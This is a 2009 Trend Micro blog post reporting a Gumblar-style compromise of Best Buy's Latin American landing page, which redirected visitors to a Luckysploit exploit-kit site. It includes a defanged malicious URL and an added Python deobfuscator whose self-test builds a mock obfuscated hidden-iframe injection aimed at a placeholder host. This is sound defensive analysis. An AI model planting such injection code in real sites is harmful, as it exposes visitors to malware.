Gumblar Invades Best Buy

2 July 2009

Earlier today, Trend Micro Technical Account Manager Fioravante Souza in Brazil spotted a potentially harmful URL to which visitors of the Best Buy site are being redirected.

Users who visit www.bestbuy.com, as it turns out, are redirected to the URL hxxp:// pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f. The compromised page on the domain is the landing page on which visitors choose the language to use while browsing the site. Threat Research Manager Ivan Macalintal further identified that a GEO-IP check takes place before this landing page is displayed.

“If (the) requesting IP is from the Latin America Region (LAR), users are redirected to the ‘choose English or Spanish’ page—and then bingo!” Macalintal says.

Below is a screenshot of the landing page and its source code:

Figure 1: The “language option” landing page on the Best Buy site. This page is displayed only if the IP address requesting www.bestbuy.com is from LAR.

Figure 2: The source code of the landing page. A garbled block of code at the bottom of the script is a clear sign of obfuscation. Beneath three layers of obfuscation, an iframe redirects the user to a site laden with the Luckysploit web exploit kit. The use of Luckysploit and the style of the obfuscation are reminiscent of Gumblar.
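The kind of triage Figure 2 describes, as an added example (this is not Trend Micro's tooling, and the sample page it analyses is constructed here, not the code injected into bestbuy.com): the script repeatedly peels the encodings that 2009-era iframe injectors typically stacked (eval()/document.write() wrappers, unescape(), String.fromCharCode() and \x/\u escapes; which three layers the Best Buy page actually used is not stated in the post, so these are assumptions) until no decoder matches, then reports every iframe in the decoded markup together with whether it points off-site and whether it is hidden. The domain pics.example.invalid in the sample is a placeholder.

```python
"""Peel stacked JavaScript obfuscation and flag hidden iframes in a captured page.

Added example: the decoders below are typical of Gumblar-era injections, not a
transcript of the Best Buy page, and build_sample_page() is a constructed sample.
"""
import re
import urllib.parse

MAX_LAYERS = 10

# Patterns for the encoders commonly stacked by iframe injectors of the period.
WRAPPER = re.compile(r"(?:eval|document\.write)\(\s*(['\"])(.*?)\1\s*\)", re.S)
UNESCAPE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
HEX_ESCAPE = re.compile(r"\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4}))")


def _quote(s):
    # Re-emit decoded text as a JS string literal so an outer eval()/document.write()
    # wrapper can be matched on the next pass. Limitation: text containing both
    # quote characters will not round-trip through WRAPPER.
    q = "'" if '"' in s else '"'
    return q + s + q


def _js_unescape(s):
    # JavaScript unescape() understands %XX and the non-standard %uXXXX form.
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s)


def _from_char_code(codes):
    return "".join(chr(int(c)) for c in codes.split(",") if c.strip())


DECODERS = [
    ("eval/document.write wrapper", WRAPPER, lambda m: m.group(2)),
    ("unescape()", UNESCAPE, lambda m: _quote(_js_unescape(m.group(2)))),
    ("String.fromCharCode()", FROM_CHAR_CODE, lambda m: _quote(_from_char_code(m.group(1)))),
    ("\\x / \\u escapes", HEX_ESCAPE, lambda m: chr(int(m.group(1) or m.group(2), 16))),
]


def deobfuscate(text, max_layers=MAX_LAYERS):
    """Apply the first matching decoder per pass until none matches.

    Returns (decoded text, list of decoder names in the order they were peeled)."""
    peeled = []
    for _ in range(max_layers):
        for name, pattern, repl in DECODERS:
            text, n = pattern.subn(repl, text)
            if n:
                peeled.append(name)
                break
        else:
            break  # no decoder matched: nothing left to peel
    return text, peeled


IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def _px(value):
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else 100  # unparseable size: assume visible


def find_iframes(markup, page_host):
    """Report every iframe: its src, whether it is off-site, whether it is hidden."""
    findings = []
    for m in IFRAME.finditer(markup):
        attrs = {k.lower(): (dq or sq or bare) for k, dq, sq, bare in ATTR.findall(m.group(1))}
        src = attrs.get("src", "")
        host = urllib.parse.urlsplit(src).hostname or page_host
        tiny = all(_px(attrs.get(d, "100")) <= 1 for d in ("width", "height"))
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = tiny or "display:none" in style or "visibility:hidden" in style
        findings.append({"src": src, "external": host.lower() != page_host.lower(), "hidden": hidden})
    return findings


def analyse(markup, page_host):
    decoded, peeled = deobfuscate(markup)
    return {"layers": peeled, "iframes": find_iframes(decoded, page_host)}


def build_sample_page():
    """Constructed sample (assumption), NOT the code from the Best Buy page:
    a language-chooser page carrying eval(unescape(...)) around
    document.write(String.fromCharCode(...)) around a 1x1 hidden iframe."""
    iframe = ('<iframe src="http://pics.example.invalid/gallery/?id=1" '
              'width="1" height="1" style="visibility:hidden"></iframe>')
    layer2 = "document.write(String.fromCharCode(%s))" % ",".join(str(ord(c)) for c in iframe)
    layer1 = "eval(unescape('%s'))" % urllib.parse.quote(layer2, safe="")
    return ("<html><body><h1>Choose your language</h1>\n"
            '<a href="/en">English</a> <a href="/es">Espanol</a>\n'
            "<script>%s</script></body></html>" % layer1)


if __name__ == "__main__":
    report = analyse(build_sample_page(), "www.bestbuy.com")
    print("layers peeled:", " -> ".join(report["layers"]))
    for f in report["iframes"]:
        print("iframe", f["src"], "external" if f["external"] else "same-site",
              "HIDDEN" if f["hidden"] else "visible")
```

Two caveats follow from the post itself. Because the server only serves the injected landing page to requesting IPs in LAR, the markup fed to analyse() has to be captured from a vantage point inside that region; a crawler or an analyst fetching from elsewhere gets a clean page and a false negative. And the decoders here resolve only static encodings; obfuscation that derives its key from the DOM or from runtime state has to be run in a JavaScript engine or a browser sandbox instead.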

Figure 3: WHOIS record of the .CN site, showing that the domain was created only recently, on June 4, 2009.

Same old criminals

Figure 4: Further investigation shows that the first .CN site is actually hosted in Germany and operated by attackers in Ukraine. Suffice it to say, the same Russian-Ukrainian crews are the culprits once again.

Best Buy has been informed of the redirections and is resolving the matter as of this writing.

More information to follow.

Hat tip to Advanced Threat Researcher Paul Ferguson for providing more information.

Post from: TrendLabs | Malware Blog - by Trend Micro
